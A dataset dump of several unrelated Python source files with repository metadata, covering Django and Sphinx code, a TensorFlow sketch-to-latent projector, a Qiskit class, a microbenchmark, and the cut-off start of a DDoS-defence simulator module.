avg_line_length: 33.69328 | max_line_length: 131 | alphanum_fraction: 0.411878

hexsha: 794dbd8fd6bd42e6b27c901deb0aafa877641475 | size: 584 | ext: py | lang: Python
max_stars_repo_path: blousebrothers/confs/management/commands/clean_conf_images.py | max_stars_repo_name: sladinji/blousebrothers | max_stars_repo_head_hexsha: 461de3ba011c0aaed3f0014136c4497b6890d086 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2022-01-27T11:58:10.000Z | max_stars_repo_stars_event_max_datetime: 2022-01-27T11:58:10.000Z
max_issues_repo_path: blousebrothers/confs/management/commands/clean_conf_images.py | max_issues_repo_name: sladinji/blousebrothers | max_issues_repo_head_hexsha: 461de3ba011c0aaed3f0014136c4497b6890d086 | max_issues_repo_licenses: ["MIT"] | max_issues_count: 5 | max_issues_repo_issues_event_min_datetime: 2021-03-19T00:01:54.000Z | max_issues_repo_issues_event_max_datetime: 2022-03-11T23:46:21.000Z
max_forks_repo_path: blousebrothers/confs/management/commands/clean_conf_images.py | max_forks_repo_name: sladinji/blousebrothers | max_forks_repo_head_hexsha: 461de3ba011c0aaed3f0014136c4497b6890d086 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
from django.core.management.base import BaseCommand
from blousebrothers.confs.models import Conference
class Command(BaseCommand):
    help = "Check a conference's images given its slug"
def add_arguments(self, parser):
# This is an optional argument
parser.add_argument('slug', nargs='+', type=str)
def handle(self, *args, **options):
print(options["slug"])
obj = Conference.objects.prefetch_related(
"questions__answers",
"questions__images",
).get(slug=options['slug'][0])
obj.check_images()
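# Usage sketch (hypothetical slug; the command accepts one or more slugs but
# only the first is queried):
#   python manage.py clean_conf_images my-conference-slug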
avg_line_length: 34.352941 | max_line_length: 62 | alphanum_fraction: 0.666096

hexsha: 794dbda5ee0dfbbdd30bd7de21cd621fe36055d3 | size: 16036 | ext: py | lang: Python
max_stars_repo_path: v/lib/python2.7/site-packages/sphinx/directives/other.py | max_stars_repo_name: lucywyman/slides-ii | max_stars_repo_head_hexsha: 5b00451bfabaa7e17aa32072c65d8ca7f5e3769f | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2021-05-13T19:48:03.000Z | max_stars_repo_stars_event_max_datetime: 2021-05-13T19:48:03.000Z
max_issues_repo_path: sphinx/directives/other.py | max_issues_repo_name: Rapptz/sphinx | max_issues_repo_head_hexsha: 9ff6eb55f83893e1bbdd06db87321b0c46f206e0 | max_issues_repo_licenses: ["BSD-2-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: sphinx/directives/other.py | max_forks_repo_name: Rapptz/sphinx | max_forks_repo_head_hexsha: 9ff6eb55f83893e1bbdd06db87321b0c46f206e0 | max_forks_repo_licenses: ["BSD-2-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
# -*- coding: utf-8 -*-
"""
sphinx.directives.other
~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from six.moves import range
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
from docutils.parsers.rst.directives.misc import Class
from docutils.parsers.rst.directives.misc import Include as BaseInclude
from sphinx import addnodes
from sphinx.locale import versionlabels, _
from sphinx.util import url_re, docname_join
from sphinx.util.nodes import explicit_title_re, set_source_info, \
process_index_entry
from sphinx.util.matching import patfilter
def int_or_nothing(argument):
if not argument:
return 999
return int(argument)
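# For example, ":numbered:" with no value parses to 999 (treated as an
# effectively unlimited numbering depth), while ":numbered: 2" parses to 2.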
class TocTree(Directive):
"""
Directive to notify Sphinx about the hierarchical structure of the docs,
and to include a table-of-contents like tree in the current document.
"""
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {
'maxdepth': int,
'name': directives.unchanged,
'caption': directives.unchanged_required,
'glob': directives.flag,
'hidden': directives.flag,
'includehidden': directives.flag,
'numbered': int_or_nothing,
'titlesonly': directives.flag,
}
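    # Example reST usage (the :glob: flag enables the wildcard entry):
    #
    #   .. toctree::
    #      :maxdepth: 2
    #      :glob:
    #
    #      intro
    #      tutorial/*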
def run(self):
env = self.state.document.settings.env
suffixes = env.config.source_suffix
glob = 'glob' in self.options
caption = self.options.get('caption')
if caption:
self.options.setdefault('name', nodes.fully_normalize_name(caption))
ret = []
# (title, ref) pairs, where ref may be a document, or an external link,
# and title may be None if the document's title is to be used
entries = []
includefiles = []
all_docnames = env.found_docs.copy()
# don't add the currently visited file in catch-all patterns
all_docnames.remove(env.docname)
for entry in self.content:
if not entry:
continue
if glob and ('*' in entry or '?' in entry or '[' in entry):
patname = docname_join(env.docname, entry)
docnames = sorted(patfilter(all_docnames, patname))
for docname in docnames:
all_docnames.remove(docname) # don't include it again
entries.append((None, docname))
includefiles.append(docname)
if not docnames:
ret.append(self.state.document.reporter.warning(
'toctree glob pattern %r didn\'t match any documents'
% entry, line=self.lineno))
else:
# look for explicit titles ("Some Title <document>")
m = explicit_title_re.match(entry)
if m:
ref = m.group(2)
title = m.group(1)
docname = ref
else:
ref = docname = entry
title = None
# remove suffixes (backwards compatibility)
for suffix in suffixes:
if docname.endswith(suffix):
docname = docname[:-len(suffix)]
break
# absolutize filenames
docname = docname_join(env.docname, docname)
if url_re.match(ref) or ref == 'self':
entries.append((title, ref))
elif docname not in env.found_docs:
ret.append(self.state.document.reporter.warning(
'toctree contains reference to nonexisting '
'document %r' % docname, line=self.lineno))
env.note_reread()
else:
all_docnames.discard(docname)
entries.append((title, docname))
includefiles.append(docname)
subnode = addnodes.toctree()
subnode['parent'] = env.docname
# entries contains all entries (self references, external links etc.)
subnode['entries'] = entries
# includefiles only entries that are documents
subnode['includefiles'] = includefiles
subnode['maxdepth'] = self.options.get('maxdepth', -1)
subnode['caption'] = caption
subnode['glob'] = glob
subnode['hidden'] = 'hidden' in self.options
subnode['includehidden'] = 'includehidden' in self.options
subnode['numbered'] = self.options.get('numbered', 0)
subnode['titlesonly'] = 'titlesonly' in self.options
set_source_info(self, subnode)
wrappernode = nodes.compound(classes=['toctree-wrapper'])
wrappernode.append(subnode)
self.add_name(wrappernode)
ret.append(wrappernode)
return ret
class Author(Directive):
"""
Directive to give the name of the author of the current document
or section. Shown in the output only if the show_authors option is on.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
env = self.state.document.settings.env
if not env.config.show_authors:
return []
para = nodes.paragraph(translatable=False)
emph = nodes.emphasis()
para += emph
if self.name == 'sectionauthor':
text = _('Section author: ')
elif self.name == 'moduleauthor':
text = _('Module author: ')
elif self.name == 'codeauthor':
text = _('Code author: ')
else:
text = _('Author: ')
emph += nodes.Text(text, text)
inodes, messages = self.state.inline_text(self.arguments[0],
self.lineno)
emph.extend(inodes)
return [para] + messages
class Index(Directive):
"""
Directive to add entries to the index.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
arguments = self.arguments[0].split('\n')
env = self.state.document.settings.env
targetid = 'index-%s' % env.new_serialno('index')
targetnode = nodes.target('', '', ids=[targetid])
self.state.document.note_explicit_target(targetnode)
indexnode = addnodes.index()
indexnode['entries'] = ne = []
indexnode['inline'] = False
set_source_info(self, indexnode)
for entry in arguments:
ne.extend(process_index_entry(entry, targetid))
return [indexnode, targetnode]
class VersionChange(Directive):
"""
Directive to describe a change/addition/deprecation in a specific version.
"""
has_content = True
required_arguments = 1
optional_arguments = 1
final_argument_whitespace = True
option_spec = {}
def run(self):
node = addnodes.versionmodified()
node.document = self.state.document
set_source_info(self, node)
node['type'] = self.name
node['version'] = self.arguments[0]
text = versionlabels[self.name] % self.arguments[0]
if len(self.arguments) == 2:
inodes, messages = self.state.inline_text(self.arguments[1],
self.lineno+1)
para = nodes.paragraph(self.arguments[1], '', *inodes, translatable=False)
set_source_info(self, para)
node.append(para)
else:
messages = []
if self.content:
self.state.nested_parse(self.content, self.content_offset, node)
if len(node):
if isinstance(node[0], nodes.paragraph) and node[0].rawsource:
content = nodes.inline(node[0].rawsource, translatable=True)
content.source = node[0].source
content.line = node[0].line
content += node[0].children
node[0].replace_self(nodes.paragraph('', '', content, translatable=False))
node[0].insert(0, nodes.inline('', '%s: ' % text,
classes=['versionmodified']))
else:
para = nodes.paragraph('', '',
nodes.inline('', '%s.' % text,
classes=['versionmodified']),
translatable=False)
node.append(para)
env = self.state.document.settings.env
# XXX should record node.source as well
env.note_versionchange(node['type'], node['version'], node, node.line)
return [node] + messages
class SeeAlso(BaseAdmonition):
"""
An admonition mentioning things to look at as reference.
"""
node_class = addnodes.seealso
class TabularColumns(Directive):
"""
Directive to give an explicit tabulary column definition to LaTeX.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
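    # Example reST usage: .. tabularcolumns:: |l|l|p{8cm}|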
def run(self):
node = addnodes.tabular_col_spec()
node['spec'] = self.arguments[0]
set_source_info(self, node)
return [node]
class Centered(Directive):
"""
Directive to create a centered line of bold text.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
if not self.arguments:
return []
subnode = addnodes.centered()
inodes, messages = self.state.inline_text(self.arguments[0],
self.lineno)
subnode.extend(inodes)
return [subnode] + messages
class Acks(Directive):
"""
Directive for a list of names.
"""
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {}
def run(self):
node = addnodes.acks()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
if len(node.children) != 1 or not isinstance(node.children[0],
nodes.bullet_list):
return [self.state.document.reporter.warning(
'.. acks content is not a list', line=self.lineno)]
return [node]
class HList(Directive):
"""
Directive for a list that gets compacted horizontally.
"""
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {
'columns': int,
}
def run(self):
ncolumns = self.options.get('columns', 2)
node = nodes.paragraph()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
if len(node.children) != 1 or not isinstance(node.children[0],
nodes.bullet_list):
return [self.state.document.reporter.warning(
'.. hlist content is not a list', line=self.lineno)]
fulllist = node.children[0]
# create a hlist node where the items are distributed
npercol, nmore = divmod(len(fulllist), ncolumns)
index = 0
newnode = addnodes.hlist()
for column in range(ncolumns):
endindex = index + (column < nmore and (npercol+1) or npercol)
col = addnodes.hlistcol()
col += nodes.bullet_list()
col[0] += fulllist.children[index:endindex]
index = endindex
newnode += col
return [newnode]
class Only(Directive):
"""
Directive to only include text if the given tag(s) are enabled.
"""
has_content = True
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
node = addnodes.only()
node.document = self.state.document
set_source_info(self, node)
node['expr'] = self.arguments[0]
# Same as util.nested_parse_with_titles but try to handle nested
# sections which should be raised higher up the doctree.
surrounding_title_styles = self.state.memo.title_styles
surrounding_section_level = self.state.memo.section_level
self.state.memo.title_styles = []
self.state.memo.section_level = 0
try:
self.state.nested_parse(self.content, self.content_offset,
node, match_titles=1)
title_styles = self.state.memo.title_styles
if (not surrounding_title_styles or
not title_styles or
title_styles[0] not in surrounding_title_styles or
not self.state.parent):
# No nested sections so no special handling needed.
return [node]
# Calculate the depths of the current and nested sections.
current_depth = 0
parent = self.state.parent
while parent:
current_depth += 1
parent = parent.parent
current_depth -= 2
title_style = title_styles[0]
nested_depth = len(surrounding_title_styles)
if title_style in surrounding_title_styles:
nested_depth = surrounding_title_styles.index(title_style)
# Use these depths to determine where the nested sections should
# be placed in the doctree.
n_sects_to_raise = current_depth - nested_depth + 1
parent = self.state.parent
for i in range(n_sects_to_raise):
if parent.parent:
parent = parent.parent
parent.append(node)
return []
finally:
self.state.memo.title_styles = surrounding_title_styles
self.state.memo.section_level = surrounding_section_level
class Include(BaseInclude):
"""
Like the standard "Include" directive, but interprets absolute paths
"correctly", i.e. relative to source directory.
"""
def run(self):
env = self.state.document.settings.env
if self.arguments[0].startswith('<') and \
self.arguments[0].endswith('>'):
# docutils "standard" includes, do not do path processing
return BaseInclude.run(self)
rel_filename, filename = env.relfn2path(self.arguments[0])
self.arguments[0] = filename
return BaseInclude.run(self)
directives.register_directive('toctree', TocTree)
directives.register_directive('sectionauthor', Author)
directives.register_directive('moduleauthor', Author)
directives.register_directive('codeauthor', Author)
directives.register_directive('index', Index)
directives.register_directive('deprecated', VersionChange)
directives.register_directive('versionadded', VersionChange)
directives.register_directive('versionchanged', VersionChange)
directives.register_directive('seealso', SeeAlso)
directives.register_directive('tabularcolumns', TabularColumns)
directives.register_directive('centered', Centered)
directives.register_directive('acks', Acks)
directives.register_directive('hlist', HList)
directives.register_directive('only', Only)
directives.register_directive('include', Include)
# register the standard rst class directive under a different name
# only for backwards compatibility now
directives.register_directive('cssclass', Class)
# new standard name when default-domain with "class" is in effect
directives.register_directive('rst-class', Class)
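# A minimal sketch of the same registration pattern (hypothetical directive;
# not part of Sphinx itself):
#
#   class HelloWorld(Directive):
#       required_arguments = 1
#       final_argument_whitespace = True
#
#       def run(self):
#           return [nodes.paragraph(text='Hello %s' % self.arguments[0])]
#
#   directives.register_directive('helloworld', HelloWorld)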
avg_line_length: 37.12037 | max_line_length: 90 | alphanum_fraction: 0.602582

hexsha: 794dbe94a4ebec5f45950698cf43f413e6e94506 | size: 416 | ext: py | lang: Python
max_stars_repo_path: phigaro/batch/runner.py | max_stars_repo_name: Stormrider935/phigaro | max_stars_repo_head_hexsha: d2dfb311d069e8edc6261b800f73380687b58798 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2022-03-09T13:57:06.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-09T13:57:06.000Z
max_issues_repo_path: phigaro/batch/runner.py | max_issues_repo_name: Stormrider935/phigaro | max_issues_repo_head_hexsha: d2dfb311d069e8edc6261b800f73380687b58798 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: phigaro/batch/runner.py | max_forks_repo_name: Stormrider935/phigaro | max_forks_repo_head_hexsha: d2dfb311d069e8edc6261b800f73380687b58798 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
from .task.base import AbstractTask
import logging
logger = logging.getLogger(__name__)
def run_tasks_chain(tasks_chain):
    """
    Run every task in the chain in order and return the output of the last
    task (None if the chain is empty).

    :type tasks_chain: list[AbstractTask]
    :rtype: str
    """
    output = None  # returned unchanged if the chain is empty
    for task in tasks_chain:
        logger.info("Executing {task}. output: {output}".format(
            task=task.task_name,
            output=task.output()
        ))
        task.run()
        output = task.output()
    return output
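# Usage sketch (EchoTask is hypothetical; AbstractTask is assumed, from the
# calls above, to expose task_name, run() and output()):
#
#   chain = [EchoTask("first"), EchoTask("second")]
#   final_output = run_tasks_chain(chain)  # output of the last task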
avg_line_length: 19.809524 | max_line_length: 64 | alphanum_fraction: 0.620192

hexsha: 794dc0d18821e1cdba546e3d23cd9deed75ef312 | size: 3312 | ext: py | lang: Python
max_stars_repo_path: manager/apps/brand/migrations/0009_auto__add_field_brand_brand_logo.py | max_stars_repo_name: willArrive/brand-manager | max_stars_repo_head_hexsha: 8fc9b07921b970e88c2e2abd2a69c0e8a27ad212 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 3 | max_stars_repo_stars_event_min_datetime: 2016-11-17T14:21:25.000Z | max_stars_repo_stars_event_max_datetime: 2019-11-15T16:25:11.000Z
max_issues_repo_path: manager/apps/brand/migrations/0009_auto__add_field_brand_brand_logo.py | max_issues_repo_name: willArrive/brand-manager | max_issues_repo_head_hexsha: 8fc9b07921b970e88c2e2abd2a69c0e8a27ad212 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: manager/apps/brand/migrations/0009_auto__add_field_brand_brand_logo.py | max_forks_repo_name: willArrive/brand-manager | max_forks_repo_head_hexsha: 8fc9b07921b970e88c2e2abd2a69c0e8a27ad212 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2016-12-19T23:32:48.000Z | max_forks_repo_forks_event_max_datetime: 2016-12-19T23:32:48.000Z
content:
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Brand.brand_logo'
db.add_column(u'brand', 'brand_logo',
self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, db_column=u'BRAND_LOGO', blank=True),
keep_default=False)
        # Backfill BRAND_LOGO with a path derived from each brand's BSIN
db.execute("UPDATE BRAND SET \"BRAND_LOGO\"=CONCAT(CONCAT('brand/logo/', \"BSIN\"), '.jpg');")
def backwards(self, orm):
# Deleting field 'Brand.brand_logo'
db.delete_column(u'brand', u'BRAND_LOGO')
models = {
u'brand.brand': {
'Meta': {'unique_together': "((u'brand_nm', u'owner_cd'),)", 'object_name': 'Brand', 'db_table': "u'brand'"},
'brand_link': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'db_column': "u'BRAND_LINK'", 'blank': 'True'}),
'brand_logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'db_column': "u'BRAND_LOGO'", 'blank': 'True'}),
'brand_nm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'BRAND_NM'"}),
'brand_type_cd': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brand.BrandType']", 'db_column': "u'BRAND_TYPE_CD'"}),
'bsin': ('django.db.models.fields.CharField', [], {'max_length': '6', 'primary_key': 'True', 'db_column': "u'BSIN'"}),
'comments': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_column': "u'COMMENTS'", 'blank': 'True'}),
'flag_delete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "u'FLAG_DELETE'"}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_column': "u'LAST_MODIFIED'", 'blank': 'True'}),
'owner_cd': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brand.BrandOwner']", 'null': 'True', 'db_column': "u'OWNER_CD'", 'blank': 'True'})
},
u'brand.brandowner': {
'Meta': {'object_name': 'BrandOwner', 'db_table': "u'brand_owner'"},
'owner_cd': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "u'OWNER_CD'"}),
'owner_link': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'OWNER_LINK'"}),
'owner_nm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'OWNER_NM'"}),
'owner_wiki_en': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'OWNER_WIKI_EN'"})
},
u'brand.brandtype': {
'Meta': {'object_name': 'BrandType', 'db_table': "u'brand_type'"},
'brand_type_cd': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "u'BRAND_TYPE_CD'"}),
'brand_type_nm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'BRAND_TYPE_NM'"})
}
}
complete_apps = ['brand']
avg_line_length: 63.692308 | max_line_length: 171 | alphanum_fraction: 0.594203

hexsha: 794dc26bd4f1464b1d2f8d54f3a8054d514960ef | size: 4278 | ext: py | lang: Python
max_stars_repo_path: Project2Manifold.py | max_stars_repo_name: thu-fit/DCGAN-anime | max_stars_repo_head_hexsha: da549bd45a6ca3c4c5a8894945d3242c59f823a0 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: Project2Manifold.py | max_issues_repo_name: thu-fit/DCGAN-anime | max_issues_repo_head_hexsha: da549bd45a6ca3c4c5a8894945d3242c59f823a0 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: Project2Manifold.py | max_forks_repo_name: thu-fit/DCGAN-anime | max_forks_repo_head_hexsha: da549bd45a6ca3c4c5a8894945d3242c59f823a0 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
from model import DCGAN
import tensorflow as tf
from utils import *
from ops import *
import numpy as np
from utils_extended import *
import os
class Project2Manifold:
def __init__(self, dcgan, FLAGS):
self.dcgan = dcgan
self.FLAGS = FLAGS
self.output_height = FLAGS.output_height
self.output_width = FLAGS.output_width
self.f_dim = 64 # first layer feature dimension
self.z_dim = dcgan.z_dim
self.batch_size = dcgan.batch_size
self.sess = dcgan.sess
self.p_bn1 = batch_norm(name='p_bn1')
self.p_bn2 = batch_norm(name='p_bn2')
self.p_bn3 = batch_norm(name='p_bn3')
        # log folder
self.logdir = "./projector_log"
if not os.path.isdir(self.logdir):
os.mkdir(self.logdir)
def build_model(self):
# z --> x --> sketch, the pair(sketch, z) which will be used to train projector
self.z = tf.placeholder(tf.float32, [self.batch_size, self.z_dim], name='z')
self.sketch = tf.placeholder(tf.float32, [self.batch_size, self.output_height, self.output_width, 1], name='sketch')
self.x_generated = self.dcgan.sampler(self.z)
# define projector sketch --> z
self.z_project = self.sketch2z(self.sketch)
# loss of projector
self.loss = tf.reduce_mean(tf.squared_difference(self.z, self.z_project))
# projected x = G(z), used to compare with x_generated
self.x_project = self.dcgan.sampler(self.z_project)
# variables to train
t_vars = tf.trainable_variables()
self.p_vars = [var for var in t_vars if 'p_' in var.name]
# define summaries, which can be shown by tensorboard
loss_sum = scalar_summary("p_loss", self.loss)
z_sum = histogram_summary("z", self.z)
z_project_sum = histogram_summary("z_project", self.z_project)
x_generated_sum = image_summary("x_generated", self.x_generated)
sketch_sum = image_summary("sketch", self.sketch)
x_project_sum = image_summary("x_project", self.x_project)
self.sum_merged = merge_summary([loss_sum, z_sum, z_project_sum,
x_generated_sum, sketch_sum, x_project_sum])
self.writer = SummaryWriter(self.logdir, self.sess.graph)
def train(self, iteration):
# optimizer
self.optim = tf.train.AdamOptimizer(self.FLAGS.learning_rate, beta1=self.FLAGS.beta1) \
.minimize(self.loss, var_list = self.p_vars)
# initialize
try:
tf.global_variables_initializer().run()
except:
tf.initialize_all_variables().run()
# load model
could_load, checkpoint_counter = self.dcgan.load(self.dcgan.checkpoint_dir)
if could_load:
counter = checkpoint_counter
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
        # main training loop
for it in xrange(iteration):
# generate a pair of batch samples (sketch, z)
batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]) \
.astype(np.float32)
batch_x, = self.sess.run([self.x_generated], feed_dict = {self.z: batch_z})
# print(self.sess.run([tf.shape(self.x_generated)]))
# print(np.shape(batch_x))
batch_sketch = image2edge(batch_x).astype(np.float32)
# train the projector using the generated pair (sketch, z)
_, loss_, _, summary_str = self.sess.run([self.optim, self.loss, self.x_project, self.sum_merged],
feed_dict = {
self.sketch: batch_sketch,
self.z: batch_z
})
self.writer.add_summary(summary_str, it)
print("iteration: {}, loss: {} ".format(it, loss_))
def sketch2z(self, sketch, batch_size=None, reuse=False):
'''construct graph which maps a sketch to z
'''
if batch_size is None:
batch_size = self.batch_size
with tf.variable_scope("sketch2z") as scope:
if reuse:
scope.reuse_variables()
h0 = lrelu(conv2d(sketch, self.f_dim, name='p_h0_conv'))
h1 = lrelu(self.p_bn1(conv2d(h0, self.f_dim*2, name='p_h1_conv')))
h2 = lrelu(self.p_bn2(conv2d(h1, self.f_dim*4, name='p_h2_conv')))
h3 = lrelu(self.p_bn3(conv2d(h2, self.f_dim*8, name='p_h3_conv')))
z = linear(tf.reshape(h3, [batch_size, -1]), self.z_dim, 'p_h3_lin')
return tf.nn.tanh(z)
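# Usage sketch (assumes a trained DCGAN checkpoint and a FLAGS namespace
# prepared as in the surrounding repository):
#
#   p2m = Project2Manifold(dcgan, FLAGS)
#   p2m.build_model()
#   p2m.train(iteration=10000)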
avg_line_length: 33.952381 | max_line_length: 120 | alphanum_fraction: 0.654278

hexsha: 794dc459f5bb403856c9a652bb2463eee15f6644 | size: 1621 | ext: py | lang: Python
max_stars_repo_path: qiskit_nature/drivers/watson_hamiltonian.py | max_stars_repo_name: divshacker/qiskit-nature | max_stars_repo_head_hexsha: 08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: qiskit_nature/drivers/watson_hamiltonian.py | max_issues_repo_name: divshacker/qiskit-nature | max_issues_repo_head_hexsha: 08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: qiskit_nature/drivers/watson_hamiltonian.py | max_forks_repo_name: divshacker/qiskit-nature | max_forks_repo_head_hexsha: 08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Watson Hamiltonian """
from typing import Union, List
import warnings
class WatsonHamiltonian:
"""**DEPRECATED**
Watson Hamiltonian class containing the results of a driver's anharmonic calculation
"""
def __init__(self, data: List[List[Union[int, float]]], num_modes: int):
"""
Args:
data: Hamiltonian matrix elements
num_modes: number of modes
"""
warnings.warn(
"This WatsonHamiltonian is deprecated as of 0.2.0, "
"and will be removed no earlier than 3 months after the release. "
"You should use the qiskit_nature.drivers.second_quantization "
"WatsonHamiltonian as a direct replacement instead.",
DeprecationWarning,
stacklevel=2,
)
self._data = data
self._num_modes = num_modes
@property
def data(self) -> List[List[Union[int, float]]]:
"""Returns the matrix elements of the Hamiltonian"""
return self._data
@property
def num_modes(self) -> int:
"""Returns the number of modes"""
return self._num_modes
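# A minimal usage sketch (hypothetical matrix elements): constructing this
# deprecated class emits a DeprecationWarning, which can be captured with the
# warnings module already imported above.
#
# with warnings.catch_warnings(record=True) as caught:
#     warnings.simplefilter("always")
#     ham = WatsonHamiltonian(data=[[1, 0, 605.3]], num_modes=1)
# assert issubclass(caught[-1].category, DeprecationWarning)
# assert ham.num_modes == 1 and ham.data == [[1, 0, 605.3]]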
| 31.784314
| 88
| 0.657002
|
794dc4eb1e3d23a5e3c4cfe480a62ddd7639579b
| 121
|
py
|
Python
|
test_suite/microbenchmarks/bench11/test.py
|
joncatanio/cannoli
|
410f6bea362bf9e33eecc0e01fb080dadd14ef23
|
[
"MIT"
] | 755
|
2017-12-09T05:34:43.000Z
|
2022-03-26T09:15:56.000Z
|
test_suite/microbenchmarks/bench11/test.py
|
joncatanio/cannoli
|
410f6bea362bf9e33eecc0e01fb080dadd14ef23
|
[
"MIT"
] | 8
|
2017-12-12T01:03:18.000Z
|
2020-06-29T01:41:03.000Z
|
test_suite/microbenchmarks/bench11/test.py
|
joncatanio/cannoli
|
410f6bea362bf9e33eecc0e01fb080dadd14ef23
|
[
"MIT"
] | 23
|
2018-05-17T17:48:23.000Z
|
2022-03-26T09:15:57.000Z
|
lst = []
i = 0
while i < 100:
i += 1
lst.append(i)
i = 0
while i < 1000000:
i += 1
reversed_lst = lst[::-1]
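# Note: slicing with step -1 returns a reversed copy and leaves the original
# list untouched, so here lst[0] == 1 while reversed_lst[0] == 100.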
| 11
| 27
| 0.487603
|
794dc69b278c1ea0bc6f99f1bd1710158343f430
| 730
|
py
|
Python
|
lib_ddos_simulator/managers/protag/isolator_2i_kf.py
|
jfuruness/lib_ddos_simulator
|
2d860fd3f35f4c25262f5269251eed89975f95e8
|
[
"BSD-4-Clause"
] | 1
|
2020-04-01T22:42:36.000Z
|
2020-04-01T22:42:36.000Z
|
lib_ddos_simulator/managers/protag/isolator_2i_kf.py
|
jfuruness/lib_ddos_simulator
|
2d860fd3f35f4c25262f5269251eed89975f95e8
|
[
"BSD-4-Clause"
] | null | null | null |
lib_ddos_simulator/managers/protag/isolator_2i_kf.py
|
jfuruness/lib_ddos_simulator
|
2d860fd3f35f4c25262f5269251eed89975f95e8
|
[
"BSD-4-Clause"
] | 1
|
2020-02-16T17:55:46.000Z
|
2020-02-16T17:55:46.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""This module contains the class Protag_Manager, which manages a cloud
This manager inherits Manager class and uses Protag shuffling algorithm
"""
__license__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com, agorbenko97@gmail.com"
__status__ = "Development"
from .isolator_2i_1f import Isolator_2i_1f
from ...simulation_objects import User_Status
from ...utils import split_list
class Isolator_2i_kf(Isolator_2i_1f):
"""Simulates a manager for a DDOS attack
